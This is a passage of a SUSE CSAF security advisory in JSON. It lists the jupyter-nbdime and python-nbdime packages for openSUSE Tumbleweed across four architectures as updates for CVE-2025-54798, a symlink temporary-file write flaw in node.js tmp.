"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15502-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54798 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54798/"
}
],
"title": "jupyter-nbdime-7.0.2-23.1 on GA media",
"tracking": {
"current_release_date": "2025-08-29T00:00:00Z",
"generator": {
"date": "2025-08-29T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15502-1",
"initial_release_date": "2025-08-29T00:00:00Z",
"revision_history": [
{
"date": "2025-08-29T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "jupyter-nbdime-7.0.2-23.1.aarch64",
"product": {
"name": "jupyter-nbdime-7.0.2-23.1.aarch64",
"product_id": "jupyter-nbdime-7.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.aarch64",
"product": {
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.aarch64",
"product_id": "jupyter-nbdime-jupyterlab-3.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-nbdime-4.0.2-23.1.aarch64",
"product": {
"name": "python311-nbdime-4.0.2-23.1.aarch64",
"product_id": "python311-nbdime-4.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-nbdime-git-4.0.2-23.1.aarch64",
"product": {
"name": "python311-nbdime-git-4.0.2-23.1.aarch64",
"product_id": "python311-nbdime-git-4.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-nbdime-hg-4.0.2-23.1.aarch64",
"product": {
"name": "python311-nbdime-hg-4.0.2-23.1.aarch64",
"product_id": "python311-nbdime-hg-4.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "python312-nbdime-4.0.2-23.1.aarch64",
"product": {
"name": "python312-nbdime-4.0.2-23.1.aarch64",
"product_id": "python312-nbdime-4.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "python312-nbdime-git-4.0.2-23.1.aarch64",
"product": {
"name": "python312-nbdime-git-4.0.2-23.1.aarch64",
"product_id": "python312-nbdime-git-4.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "python312-nbdime-hg-4.0.2-23.1.aarch64",
"product": {
"name": "python312-nbdime-hg-4.0.2-23.1.aarch64",
"product_id": "python312-nbdime-hg-4.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-nbdime-4.0.2-23.1.aarch64",
"product": {
"name": "python313-nbdime-4.0.2-23.1.aarch64",
"product_id": "python313-nbdime-4.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-nbdime-git-4.0.2-23.1.aarch64",
"product": {
"name": "python313-nbdime-git-4.0.2-23.1.aarch64",
"product_id": "python313-nbdime-git-4.0.2-23.1.aarch64"
}
},
{
"category": "product_version",
"name": "python313-nbdime-hg-4.0.2-23.1.aarch64",
"product": {
"name": "python313-nbdime-hg-4.0.2-23.1.aarch64",
"product_id": "python313-nbdime-hg-4.0.2-23.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "jupyter-nbdime-7.0.2-23.1.ppc64le",
"product": {
"name": "jupyter-nbdime-7.0.2-23.1.ppc64le",
"product_id": "jupyter-nbdime-7.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.ppc64le",
"product": {
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.ppc64le",
"product_id": "jupyter-nbdime-jupyterlab-3.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-nbdime-4.0.2-23.1.ppc64le",
"product": {
"name": "python311-nbdime-4.0.2-23.1.ppc64le",
"product_id": "python311-nbdime-4.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-nbdime-git-4.0.2-23.1.ppc64le",
"product": {
"name": "python311-nbdime-git-4.0.2-23.1.ppc64le",
"product_id": "python311-nbdime-git-4.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-nbdime-hg-4.0.2-23.1.ppc64le",
"product": {
"name": "python311-nbdime-hg-4.0.2-23.1.ppc64le",
"product_id": "python311-nbdime-hg-4.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python312-nbdime-4.0.2-23.1.ppc64le",
"product": {
"name": "python312-nbdime-4.0.2-23.1.ppc64le",
"product_id": "python312-nbdime-4.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python312-nbdime-git-4.0.2-23.1.ppc64le",
"product": {
"name": "python312-nbdime-git-4.0.2-23.1.ppc64le",
"product_id": "python312-nbdime-git-4.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python312-nbdime-hg-4.0.2-23.1.ppc64le",
"product": {
"name": "python312-nbdime-hg-4.0.2-23.1.ppc64le",
"product_id": "python312-nbdime-hg-4.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-nbdime-4.0.2-23.1.ppc64le",
"product": {
"name": "python313-nbdime-4.0.2-23.1.ppc64le",
"product_id": "python313-nbdime-4.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-nbdime-git-4.0.2-23.1.ppc64le",
"product": {
"name": "python313-nbdime-git-4.0.2-23.1.ppc64le",
"product_id": "python313-nbdime-git-4.0.2-23.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python313-nbdime-hg-4.0.2-23.1.ppc64le",
"product": {
"name": "python313-nbdime-hg-4.0.2-23.1.ppc64le",
"product_id": "python313-nbdime-hg-4.0.2-23.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "jupyter-nbdime-7.0.2-23.1.s390x",
"product": {
"name": "jupyter-nbdime-7.0.2-23.1.s390x",
"product_id": "jupyter-nbdime-7.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.s390x",
"product": {
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.s390x",
"product_id": "jupyter-nbdime-jupyterlab-3.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-nbdime-4.0.2-23.1.s390x",
"product": {
"name": "python311-nbdime-4.0.2-23.1.s390x",
"product_id": "python311-nbdime-4.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-nbdime-git-4.0.2-23.1.s390x",
"product": {
"name": "python311-nbdime-git-4.0.2-23.1.s390x",
"product_id": "python311-nbdime-git-4.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-nbdime-hg-4.0.2-23.1.s390x",
"product": {
"name": "python311-nbdime-hg-4.0.2-23.1.s390x",
"product_id": "python311-nbdime-hg-4.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "python312-nbdime-4.0.2-23.1.s390x",
"product": {
"name": "python312-nbdime-4.0.2-23.1.s390x",
"product_id": "python312-nbdime-4.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "python312-nbdime-git-4.0.2-23.1.s390x",
"product": {
"name": "python312-nbdime-git-4.0.2-23.1.s390x",
"product_id": "python312-nbdime-git-4.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "python312-nbdime-hg-4.0.2-23.1.s390x",
"product": {
"name": "python312-nbdime-hg-4.0.2-23.1.s390x",
"product_id": "python312-nbdime-hg-4.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-nbdime-4.0.2-23.1.s390x",
"product": {
"name": "python313-nbdime-4.0.2-23.1.s390x",
"product_id": "python313-nbdime-4.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-nbdime-git-4.0.2-23.1.s390x",
"product": {
"name": "python313-nbdime-git-4.0.2-23.1.s390x",
"product_id": "python313-nbdime-git-4.0.2-23.1.s390x"
}
},
{
"category": "product_version",
"name": "python313-nbdime-hg-4.0.2-23.1.s390x",
"product": {
"name": "python313-nbdime-hg-4.0.2-23.1.s390x",
"product_id": "python313-nbdime-hg-4.0.2-23.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "jupyter-nbdime-7.0.2-23.1.x86_64",
"product": {
"name": "jupyter-nbdime-7.0.2-23.1.x86_64",
"product_id": "jupyter-nbdime-7.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.x86_64",
"product": {
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.x86_64",
"product_id": "jupyter-nbdime-jupyterlab-3.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-nbdime-4.0.2-23.1.x86_64",
"product": {
"name": "python311-nbdime-4.0.2-23.1.x86_64",
"product_id": "python311-nbdime-4.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-nbdime-git-4.0.2-23.1.x86_64",
"product": {
"name": "python311-nbdime-git-4.0.2-23.1.x86_64",
"product_id": "python311-nbdime-git-4.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-nbdime-hg-4.0.2-23.1.x86_64",
"product": {
"name": "python311-nbdime-hg-4.0.2-23.1.x86_64",
"product_id": "python311-nbdime-hg-4.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "python312-nbdime-4.0.2-23.1.x86_64",
"product": {
"name": "python312-nbdime-4.0.2-23.1.x86_64",
"product_id": "python312-nbdime-4.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "python312-nbdime-git-4.0.2-23.1.x86_64",
"product": {
"name": "python312-nbdime-git-4.0.2-23.1.x86_64",
"product_id": "python312-nbdime-git-4.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "python312-nbdime-hg-4.0.2-23.1.x86_64",
"product": {
"name": "python312-nbdime-hg-4.0.2-23.1.x86_64",
"product_id": "python312-nbdime-hg-4.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-nbdime-4.0.2-23.1.x86_64",
"product": {
"name": "python313-nbdime-4.0.2-23.1.x86_64",
"product_id": "python313-nbdime-4.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-nbdime-git-4.0.2-23.1.x86_64",
"product": {
"name": "python313-nbdime-git-4.0.2-23.1.x86_64",
"product_id": "python313-nbdime-git-4.0.2-23.1.x86_64"
}
},
{
"category": "product_version",
"name": "python313-nbdime-hg-4.0.2-23.1.x86_64",
"product": {
"name": "python313-nbdime-hg-4.0.2-23.1.x86_64",
"product_id": "python313-nbdime-hg-4.0.2-23.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-nbdime-7.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.aarch64"
},
"product_reference": "jupyter-nbdime-7.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-nbdime-7.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.ppc64le"
},
"product_reference": "jupyter-nbdime-7.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-nbdime-7.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.s390x"
},
"product_reference": "jupyter-nbdime-7.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-nbdime-7.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.x86_64"
},
"product_reference": "jupyter-nbdime-7.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.aarch64"
},
"product_reference": "jupyter-nbdime-jupyterlab-3.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.ppc64le"
},
"product_reference": "jupyter-nbdime-jupyterlab-3.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.s390x"
},
"product_reference": "jupyter-nbdime-jupyterlab-3.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-nbdime-jupyterlab-3.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.x86_64"
},
"product_reference": "jupyter-nbdime-jupyterlab-3.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-4.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.aarch64"
},
"product_reference": "python311-nbdime-4.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-4.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.ppc64le"
},
"product_reference": "python311-nbdime-4.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-4.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.s390x"
},
"product_reference": "python311-nbdime-4.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-4.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.x86_64"
},
"product_reference": "python311-nbdime-4.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-git-4.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.aarch64"
},
"product_reference": "python311-nbdime-git-4.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-git-4.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.ppc64le"
},
"product_reference": "python311-nbdime-git-4.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-git-4.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.s390x"
},
"product_reference": "python311-nbdime-git-4.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-git-4.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.x86_64"
},
"product_reference": "python311-nbdime-git-4.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-hg-4.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.aarch64"
},
"product_reference": "python311-nbdime-hg-4.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-hg-4.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.ppc64le"
},
"product_reference": "python311-nbdime-hg-4.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-hg-4.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.s390x"
},
"product_reference": "python311-nbdime-hg-4.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-nbdime-hg-4.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.x86_64"
},
"product_reference": "python311-nbdime-hg-4.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-4.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.aarch64"
},
"product_reference": "python312-nbdime-4.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-4.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.ppc64le"
},
"product_reference": "python312-nbdime-4.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-4.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.s390x"
},
"product_reference": "python312-nbdime-4.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-4.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.x86_64"
},
"product_reference": "python312-nbdime-4.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-git-4.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.aarch64"
},
"product_reference": "python312-nbdime-git-4.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-git-4.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.ppc64le"
},
"product_reference": "python312-nbdime-git-4.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-git-4.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.s390x"
},
"product_reference": "python312-nbdime-git-4.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-git-4.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.x86_64"
},
"product_reference": "python312-nbdime-git-4.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-hg-4.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.aarch64"
},
"product_reference": "python312-nbdime-hg-4.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-hg-4.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.ppc64le"
},
"product_reference": "python312-nbdime-hg-4.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-hg-4.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.s390x"
},
"product_reference": "python312-nbdime-hg-4.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python312-nbdime-hg-4.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.x86_64"
},
"product_reference": "python312-nbdime-hg-4.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-4.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.aarch64"
},
"product_reference": "python313-nbdime-4.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-4.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.ppc64le"
},
"product_reference": "python313-nbdime-4.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-4.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.s390x"
},
"product_reference": "python313-nbdime-4.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-4.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-4.0.2-23.1.x86_64"
},
"product_reference": "python313-nbdime-4.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-git-4.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.aarch64"
},
"product_reference": "python313-nbdime-git-4.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-git-4.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.ppc64le"
},
"product_reference": "python313-nbdime-git-4.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-git-4.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.s390x"
},
"product_reference": "python313-nbdime-git-4.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-git-4.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-git-4.0.2-23.1.x86_64"
},
"product_reference": "python313-nbdime-git-4.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-hg-4.0.2-23.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.aarch64"
},
"product_reference": "python313-nbdime-hg-4.0.2-23.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-hg-4.0.2-23.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.ppc64le"
},
"product_reference": "python313-nbdime-hg-4.0.2-23.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-hg-4.0.2-23.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.s390x"
},
"product_reference": "python313-nbdime-hg-4.0.2-23.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-nbdime-hg-4.0.2-23.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python313-nbdime-hg-4.0.2-23.1.x86_64"
},
"product_reference": "python313-nbdime-hg-4.0.2-23.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-54798",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54798"
}
],
"notes": [
{
"category": "general",
"text": "tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.aarch64",
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.s390x",
"openSUSE Tumbleweed:jupyter-nbdime-7.0.2-23.1.x86_64",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.aarch64",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.s390x",
"openSUSE Tumbleweed:jupyter-nbdime-jupyterlab-3.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python311-nbdime-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python311-nbdime-git-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python311-nbdime-hg-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python312-nbdime-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.aarch64",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.ppc64le",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.s390x",
"openSUSE Tumbleweed:python312-nbdime-git-4.0.2-23.1.x86_64",
"openSUSE Tumbleweed:python312-nbdime-hg-4.0.2-23.1.aarch64",
